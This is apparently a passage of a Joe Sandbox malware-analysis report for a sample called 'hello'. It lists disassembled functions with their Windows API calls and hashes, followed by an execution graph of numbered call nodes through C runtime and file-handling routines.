                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                        • String ID:
                                        • API String ID: 1557639607-0
                                        • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                        • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                        • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                        • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                        APIs
                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                          • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                          • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$EnvironmentExpandStrings$??2@
                                        • String ID:
                                        • API String ID: 612612615-0
                                        • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                        • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                        • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                        • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                        APIs
                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                        • SetWindowTextW.USER32(?,?), ref: 00403B12
                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@TextWindow$Length
                                        • String ID:
                                        • API String ID: 2308334395-0
                                        • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                        • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                        • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                        • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                        APIs
                                        • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                        • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                        • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                        • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CreateFontIndirectItemMessageObjectSend
                                        • String ID:
                                        • API String ID: 2001801573-0
                                        • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                        • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                        • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                        • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                        APIs
                                        • GetParent.USER32(?), ref: 00401BA8
                                        • GetWindowRect.USER32(?,?), ref: 00401BC1
                                        • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                        • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ClientScreen$ParentRectWindow
                                        • String ID:
                                        • API String ID: 2099118873-0
                                        • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                        • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                        • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                        • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: _wtol
                                        • String ID: GUIFlags$[G@
                                        • API String ID: 2131799477-2126219683
                                        • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                        • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                        • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                        • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                        APIs
                                        • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: ?O@
                                        • API String ID: 1431749950-3511380453
                                        • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                        • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                        • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                        • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:1.6%
                                        Total number of Nodes:1733
                                        Total number of Limit Nodes:37
                                        execution_graph 18439 6fe239b0 18440 6fe239ee 18439->18440 18473 6fe21990 18440->18473 18442 6fe23a0a ctype 18479 6fe22370 18442->18479 18444 6fe23a69 ctype 18534 6fe21a10 18444->18534 18446 6fe23b12 18447 6fe23b16 18446->18447 18448 6fe23b77 18446->18448 18483 6fe21000 18447->18483 18450 6fe23b81 18448->18450 18451 6fe23c3b 18448->18451 18547 6fe23090 18450->18547 18579 6fe22c10 18451->18579 18455 6fe23b8c 18556 6fe231f0 18455->18556 18464 6fe23b4c ctype 18541 6fe27202 18464->18541 18467 6fe23b65 18600 6fe25590 18467->18600 18474 6fe219b4 18473->18474 18622 6fe268e2 18474->18622 18477 6fe268e2 ctype 62 API calls 18478 6fe219e7 18477->18478 18478->18442 18480 6fe2239f ctype 18479->18480 18976 6fe214a0 18480->18976 18482 6fe2240f 18482->18444 18484 6fe2102d ctype 18483->18484 18485 6fe231f0 98 API calls 18484->18485 18486 6fe21068 18485->18486 18487 6fe215f0 63 API calls 18486->18487 18488 6fe21077 18487->18488 18489 6fe23e60 18488->18489 19016 6fe33d6c 18489->19016 18491 6fe24443 18492 6fe268e2 ctype 62 API calls 18491->18492 18494 6fe24460 ctype 18492->18494 18493 6fe23b35 18509 6fe25070 18493->18509 19070 6fe3527b 18494->19070 18496 6fe244ae 19073 6fe26dc1 18496->19073 18498 6fe268e2 ctype 62 API calls 18504 6fe23ea7 _memset 18498->18504 18503 6fe2afc3 65 API calls 18503->18504 18504->18491 18504->18493 18504->18496 18504->18498 18504->18503 18506 6fe240fd 18504->18506 19030 6fe25ca0 18504->19030 19042 6fe2b1ec 18504->19042 18506->18504 18508 6fe26750 ReadFile 18506->18508 19048 6fe25e70 18506->19048 19053 6fe26230 18506->19053 19058 6fe26160 18506->19058 19063 6fe263f0 18506->19063 18508->18506 18518 6fe250a6 18509->18518 18510 6fe253de 18511 6fe26dc1 ctype 2 API calls 18510->18511 18513 6fe253e3 18511->18513 18512 6fe252bf 19175 6fe247d0 18512->19175 18516 6fe268e2 ctype 62 API calls 18513->18516 18514 6fe2538f 18517 6fe268e2 ctype 62 API calls 18514->18517 18523 6fe253ea ctype 18516->18523 18525 6fe25396 ctype 18517->18525 18518->18510 18518->18514 18519 6fe2525a 18518->18519 19116 6fe24880 18518->19116 19136 6fe24ac0 18518->19136 18519->18510 18519->18512 18519->18513 19171 6fe245f0 18519->19171 18524 6fe3527b __CxxThrowException@8 RaiseException 18523->18524 18527 6fe25432 18524->18527 18526 6fe3527b __CxxThrowException@8 RaiseException 18525->18526 18526->18510 18529 6fe2530c 18529->18464 18530 6fe231f0 98 API calls 18533 6fe25141 18530->18533 18531 6fe22600 96 API calls 18531->18533 18533->18518 18533->18530 18533->18531 19160 6fe262d0 18533->19160 19165 6fe25490 18533->19165 19429 6fe2764f 18534->19429 18536 6fe21a59 ctype 18540 6fe21af7 18536->18540 19444 6fe272fd 18536->19444 18538 6fe21ab1 GetDiskFreeSpaceW 18538->18540 18540->18446 18542 6fe27212 CloseHandle 18541->18542 18543 6fe27220 ctype 18541->18543 18542->18543 18544 6fe27236 GetLastError 18543->18544 18545 6fe27244 18543->18545 19531 6fe27bcb 18544->19531 18545->18467 19545 6fe22f60 18547->19545 18549 6fe2309f 18550 6fe230a7 18549->18550 18551 6fe230bc 18549->18551 19559 6fe23370 18550->19559 19567 6fe21580 18551->19567 18554 6fe230c7 18554->18455 18555 6fe230b8 18555->18455 18557 6fe23222 ctype 18556->18557 18558 6fe2aef1 ctype 31 API calls 18557->18558 18559 6fe23254 18558->18559 19576 6fe233f0 FindResourceExW 18559->19576 18561 6fe23268 18562 6fe2326c 18561->18562 18564 6fe2aef1 ctype 31 API calls 18561->18564 18563 6fe21580 62 API calls 18562->18563 18574 6fe23279 18563->18574 18565 6fe232bf 18564->18565 18566 6fe233f0 66 API calls 18565->18566 18567 6fe232d3 18566->18567 18568 6fe232d7 18567->18568 18569 6fe23308 18567->18569 18571 6fe21580 62 API calls 18568->18571 18570 6fe2a58c 31 API calls 18569->18570 18572 6fe2330e 18570->18572 18571->18574 18572->18562 18573 6fe23325 18572->18573 18575 6fe22b50 94 API calls 18573->18575 18576 6fe22600 18574->18576 18575->18574 19590 6fe21240 18576->19590 18578 6fe22613 18578->18467 18580 6fe22c51 ctype 18579->18580 18581 6fe22cc0 18580->18581 18583 6fe231f0 98 API calls 18580->18583 18582 6fe231f0 98 API calls 18581->18582 18584 6fe22cf9 18582->18584 18585 6fe22cad 18583->18585 18586 6fe22600 96 API calls 18584->18586 18587 6fe344cb 62 API calls 18585->18587 18588 6fe22d0b 18586->18588 18587->18581 18589 6fe22d3c 18588->18589 18590 6fe26911 ctype 63 API calls 18588->18590 18591 6fe215f0 18589->18591 18590->18589 18592 6fe21606 18591->18592 18593 6fe2165a 18591->18593 18594 6fe21646 18592->18594 18595 6fe21616 18592->18595 18593->18467 18596 6fe214a0 ctype 63 API calls 18594->18596 18597 6fe21580 62 API calls 18595->18597 18598 6fe21652 18596->18598 18599 6fe2161d 18597->18599 18598->18467 18599->18467 18601 6fe23d8b 18600->18601 18602 6fe255bb 18600->18602 18606 6fe22490 18601->18606 18602->18601 18603 6fe231f0 98 API calls 18602->18603 18604 6fe255d1 18603->18604 18605 6fe22600 96 API calls 18604->18605 18605->18601 18607 6fe224d1 ctype 18606->18607 19859 6fe27343 18607->19859 18625 6fe268ea 18622->18625 18624 6fe219be 18624->18477 18625->18624 18626 6fe349fe 18625->18626 18627 6fe34ab1 18626->18627 18636 6fe34a10 18626->18636 18628 6fe3c08e _malloc 6 API calls 18627->18628 18629 6fe34ab7 18628->18629 18631 6fe35348 __fptostr 61 API calls 18629->18631 18642 6fe34aa9 18631->18642 18634 6fe34a6d HeapAlloc 18634->18636 18636->18634 18637 6fe34a9d 18636->18637 18640 6fe34aa2 18636->18640 18636->18642 18643 6fe3c046 18636->18643 18652 6fe3be9b 18636->18652 18686 6fe35c53 18636->18686 18689 6fe349af 18636->18689 18697 6fe3c08e 18636->18697 18700 6fe35348 18637->18700 18641 6fe35348 __fptostr 61 API calls 18640->18641 18641->18642 18642->18625 18703 6fe40cfc 18643->18703 18646 6fe3c05a 18648 6fe3be9b __NMSG_WRITE 62 API calls 18646->18648 18650 6fe3c07c 18646->18650 18647 6fe40cfc __set_error_mode 62 API calls 18647->18646 18649 6fe3c072 18648->18649 18651 6fe3be9b __NMSG_WRITE 62 API calls 18649->18651 18650->18636 18651->18650 18653 6fe3beaf 18652->18653 18654 6fe40cfc __set_error_mode 59 API calls 18653->18654 18685 6fe3c00a 18653->18685 18655 6fe3bed1 18654->18655 18656 6fe3c00f GetStdHandle 18655->18656 18657 6fe40cfc __set_error_mode 59 API calls 18655->18657 18658 6fe3c01d _strlen 18656->18658 18656->18685 18659 6fe3bee2 18657->18659 18661 6fe3c036 WriteFile 18658->18661 18658->18685 18659->18656 18660 6fe3bef4 18659->18660 18660->18685 18726 6fe40997 18660->18726 18661->18685 18664 6fe3bf2a GetModuleFileNameA 18665 6fe3bf48 18664->18665 18671 6fe3bf6b _strlen 18664->18671 18667 6fe40997 _strcpy_s 59 API calls 18665->18667 18669 6fe3bf58 18667->18669 18669->18671 18672 6fe38034 __invoke_watson 10 API calls 18669->18672 18670 6fe3bfae 18751 6fe40bd3 18670->18751 18671->18670 18742 6fe40c47 18671->18742 18672->18671 18676 6fe3bfd2 18679 6fe40bd3 _strcat_s 59 API calls 18676->18679 18678 6fe38034 __invoke_watson 10 API calls 18678->18676 18680 6fe3bfe6 18679->18680 18682 6fe3bff7 18680->18682 18683 6fe38034 __invoke_watson 10 API calls 18680->18683 18681 6fe38034 __invoke_watson 10 API calls 18681->18670 18760 6fe40a6a 18682->18760 18683->18682 18685->18636 18811 6fe35c28 GetModuleHandleW 18686->18811 18690 6fe349bb ___DllMainCRTStartup 18689->18690 18693 6fe349ec ___DllMainCRTStartup 18690->18693 18814 6fe3a914 18690->18814 18692 6fe349d1 18821 6fe3b126 18692->18821 18693->18636 18698 6fe3a033 __decode_pointer 6 API calls 18697->18698 18699 6fe3c09e 18698->18699 18699->18636 18895 6fe3a206 GetLastError 18700->18895 18702 6fe3534d 18702->18640 18704 6fe40d0b 18703->18704 18705 6fe3c04d 18704->18705 18706 6fe35348 __fptostr 62 API calls 18704->18706 18705->18646 18705->18647 18707 6fe40d2e 18706->18707 18709 6fe3815c 18707->18709 18712 6fe3a033 TlsGetValue 18709->18712 18711 6fe3816c __invoke_watson 18713 6fe3a04b 18712->18713 18714 6fe3a06c GetModuleHandleW 18712->18714 18713->18714 18717 6fe3a055 TlsGetValue 18713->18717 18715 6fe3a087 GetProcAddress 18714->18715 18716 6fe3a07c 18714->18716 18719 6fe3a064 18715->18719 18722 6fe35bcf 18716->18722 18721 6fe3a060 18717->18721 18719->18711 18721->18714 18721->18719 18723 6fe35bda Sleep GetModuleHandleW 18722->18723 18724 6fe35bf8 18723->18724 18725 6fe35bfc 18723->18725 18724->18723 18724->18725 18725->18715 18725->18719 18727 6fe409a8 18726->18727 18729 6fe409af 18726->18729 18727->18729 18733 6fe409d5 18727->18733 18728 6fe35348 __fptostr 62 API calls 18730 6fe409b4 18728->18730 18729->18728 18731 6fe3815c __fptostr 6 API calls 18730->18731 18732 6fe3bf16 18731->18732 18732->18664 18735 6fe38034 18732->18735 18733->18732 18734 6fe35348 __fptostr 62 API calls 18733->18734 18734->18730 18787 6fe355b0 18735->18787 18737 6fe38061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18738 6fe38131 __invoke_watson 18737->18738 18739 6fe3813d GetCurrentProcess TerminateProcess 18737->18739 18738->18739 18789 6fe33f34 18739->18789 18741 6fe3815a 18741->18664 18745 6fe40c59 18742->18745 18743 6fe35348 __fptostr 62 API calls 18746 6fe40c79 18743->18746 18744 6fe3bf9b 18744->18670 18744->18681 18745->18744 18747 6fe40c5d 18745->18747 18749 6fe40ca3 18745->18749 18748 6fe3815c __fptostr 6 API calls 18746->18748 18747->18743 18747->18744 18748->18744 18749->18744 18750 6fe35348 __fptostr 62 API calls 18749->18750 18750->18746 18752 6fe40beb 18751->18752 18754 6fe40be4 18751->18754 18753 6fe35348 __fptostr 62 API calls 18752->18753 18759 6fe40bf0 18753->18759 18754->18752 18756 6fe40c1f 18754->18756 18755 6fe3815c __fptostr 6 API calls 18757 6fe3bfc1 18755->18757 18756->18757 18758 6fe35348 __fptostr 62 API calls 18756->18758 18757->18676 18757->18678 18758->18759 18759->18755 18798 6fe3a02a 18760->18798 18763 6fe40a8d LoadLibraryA 18765 6fe40aa2 GetProcAddress 18763->18765 18766 6fe40bb7 18763->18766 18764 6fe40b15 18771 6fe3a033 __decode_pointer 6 API calls 18764->18771 18784 6fe40b3f 18764->18784 18765->18766 18768 6fe40ab8 18765->18768 18766->18685 18767 6fe40b6a 18769 6fe3a033 __decode_pointer 6 API calls 18767->18769 18801 6fe39fb8 TlsGetValue 18768->18801 18769->18766 18770 6fe3a033 __decode_pointer 6 API calls 18781 6fe40b82 18770->18781 18773 6fe40b32 18771->18773 18775 6fe3a033 __decode_pointer 6 API calls 18773->18775 18775->18784 18776 6fe39fb8 __encode_pointer 6 API calls 18777 6fe40ad3 GetProcAddress 18776->18777 18778 6fe39fb8 __encode_pointer 6 API calls 18777->18778 18779 6fe40ae8 GetProcAddress 18778->18779 18780 6fe39fb8 __encode_pointer 6 API calls 18779->18780 18782 6fe40afd 18780->18782 18781->18767 18783 6fe3a033 __decode_pointer 6 API calls 18781->18783 18782->18764 18785 6fe40b07 GetProcAddress 18782->18785 18783->18767 18784->18767 18784->18770 18786 6fe39fb8 __encode_pointer 6 API calls 18785->18786 18786->18764 18788 6fe355bc __VEC_memzero 18787->18788 18788->18737 18790 6fe33f3e IsDebuggerPresent 18789->18790 18791 6fe33f3c 18789->18791 18797 6fe3ee35 18790->18797 18791->18741 18794 6fe37c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 18795 6fe37ca3 GetCurrentProcess TerminateProcess 18794->18795 18796 6fe37c9b __invoke_watson 18794->18796 18795->18741 18796->18795 18797->18794 18799 6fe39fb8 __encode_pointer 6 API calls 18798->18799 18800 6fe3a031 18799->18800 18800->18763 18800->18764 18802 6fe39ff1 GetModuleHandleW 18801->18802 18803 6fe39fd0 18801->18803 18805 6fe3a001 18802->18805 18806 6fe3a00c GetProcAddress 18802->18806 18803->18802 18804 6fe39fda TlsGetValue 18803->18804 18809 6fe39fe5 18804->18809 18807 6fe35bcf __crt_waiting_on_module_handle 2 API calls 18805->18807 18808 6fe39fe9 GetProcAddress 18806->18808 18810 6fe3a007 18807->18810 18808->18776 18809->18802 18809->18808 18810->18806 18810->18808 18812 6fe35c4c ExitProcess 18811->18812 18813 6fe35c3c GetProcAddress 18811->18813 18813->18812 18815 6fe3a929 18814->18815 18816 6fe3a93c EnterCriticalSection 18814->18816 18830 6fe3a851 18815->18830 18816->18692 18818 6fe3a92f 18818->18816 18856 6fe35bff 18818->18856 18822 6fe3b154 18821->18822 18823 6fe3b1ed 18822->18823 18825 6fe349dc 18822->18825 18883 6fe3ac8d 18822->18883 18823->18825 18890 6fe3ad3d 18823->18890 18827 6fe349f5 18825->18827 18894 6fe3a83a LeaveCriticalSection 18827->18894 18829 6fe349fc 18829->18693 18831 6fe3a85d ___DllMainCRTStartup 18830->18831 18832 6fe3a883 18831->18832 18833 6fe3c046 __FF_MSGBANNER 62 API calls 18831->18833 18838 6fe3a893 ___DllMainCRTStartup 18832->18838 18863 6fe3a5c3 18832->18863 18835 6fe3a872 18833->18835 18836 6fe3be9b __NMSG_WRITE 62 API calls 18835->18836 18839 6fe3a879 18836->18839 18838->18818 18842 6fe35c53 _malloc 3 API calls 18839->18842 18840 6fe3a8a5 18843 6fe35348 __fptostr 62 API calls 18840->18843 18841 6fe3a8b4 18844 6fe3a914 __lock 62 API calls 18841->18844 18842->18832 18843->18838 18845 6fe3a8bb 18844->18845 18846 6fe3a8c3 18845->18846 18847 6fe3a8ef 18845->18847 18868 6fe3e1d3 18846->18868 18849 6fe34618 __crtGetStringTypeA_stat 62 API calls 18847->18849 18851 6fe3a8e0 18849->18851 18850 6fe3a8ce 18850->18851 18872 6fe34618 18850->18872 18878 6fe3a90b 18851->18878 18854 6fe3a8da 18855 6fe35348 __fptostr 62 API calls 18854->18855 18855->18851 18857 6fe3c046 __FF_MSGBANNER 62 API calls 18856->18857 18858 6fe35c09 18857->18858 18859 6fe3be9b __NMSG_WRITE 62 API calls 18858->18859 18860 6fe35c11 18859->18860 18861 6fe3a033 __decode_pointer 6 API calls 18860->18861 18862 6fe35c1c 18861->18862 18862->18816 18865 6fe3a5cc 18863->18865 18864 6fe349fe _malloc 61 API calls 18864->18865 18865->18864 18866 6fe3a602 18865->18866 18867 6fe3a5e3 Sleep 18865->18867 18866->18840 18866->18841 18867->18865 18881 6fe353bc 18868->18881 18870 6fe3e1df InitializeCriticalSectionAndSpinCount 18871 6fe3e223 ___DllMainCRTStartup 18870->18871 18871->18850 18873 6fe34624 ___DllMainCRTStartup 18872->18873 18874 6fe34677 HeapFree 18873->18874 18875 6fe346a0 ___DllMainCRTStartup 18873->18875 18874->18875 18876 6fe3468a 18874->18876 18875->18854 18877 6fe35348 __fptostr 61 API calls 18876->18877 18877->18875 18882 6fe3a83a LeaveCriticalSection 18878->18882 18880 6fe3a912 18880->18838 18881->18870 18882->18880 18884 6fe3aca0 HeapReAlloc 18883->18884 18885 6fe3acd4 HeapAlloc 18883->18885 18886 6fe3acc2 18884->18886 18887 6fe3acbe 18884->18887 18885->18887 18888 6fe3acf7 VirtualAlloc 18885->18888 18886->18885 18887->18823 18888->18887 18889 6fe3ad11 HeapFree 18888->18889 18889->18887 18891 6fe3ad54 VirtualAlloc 18890->18891 18893 6fe3ad9b 18891->18893 18893->18825 18894->18829 18909 6fe3a0ae TlsGetValue 18895->18909 18898 6fe3a273 SetLastError 18898->18702 18901 6fe3a033 __decode_pointer 6 API calls 18902 6fe3a24b 18901->18902 18903 6fe3a252 18902->18903 18904 6fe3a26a 18902->18904 18920 6fe3a11f 18903->18920 18905 6fe34618 __crtGetStringTypeA_stat 59 API calls 18904->18905 18907 6fe3a270 18905->18907 18907->18898 18908 6fe3a25a GetCurrentThreadId 18908->18898 18910 6fe3a0c3 18909->18910 18911 6fe3a0de 18909->18911 18912 6fe3a033 __decode_pointer 6 API calls 18910->18912 18911->18898 18914 6fe3a608 18911->18914 18913 6fe3a0ce TlsSetValue 18912->18913 18913->18911 18916 6fe3a611 18914->18916 18917 6fe3a231 18916->18917 18918 6fe3a62f Sleep 18916->18918 18938 6fe3b40b 18916->18938 18917->18898 18917->18901 18919 6fe3a644 18918->18919 18919->18916 18919->18917 18955 6fe353bc 18920->18955 18922 6fe3a12b GetModuleHandleW 18923 6fe3a141 18922->18923 18924 6fe3a13b 18922->18924 18926 6fe3a159 GetProcAddress GetProcAddress 18923->18926 18927 6fe3a17d 18923->18927 18925 6fe35bcf __crt_waiting_on_module_handle 2 API calls 18924->18925 18925->18923 18926->18927 18928 6fe3a914 __lock 58 API calls 18927->18928 18929 6fe3a19c InterlockedIncrement 18928->18929 18956 6fe3a1f4 18929->18956 18932 6fe3a914 __lock 58 API calls 18933 6fe3a1bd 18932->18933 18959 6fe40414 InterlockedIncrement 18933->18959 18935 6fe3a1db 18971 6fe3a1fd 18935->18971 18937 6fe3a1e8 ___DllMainCRTStartup 18937->18908 18939 6fe3b417 ___DllMainCRTStartup 18938->18939 18940 6fe3b42f 18939->18940 18950 6fe3b44e 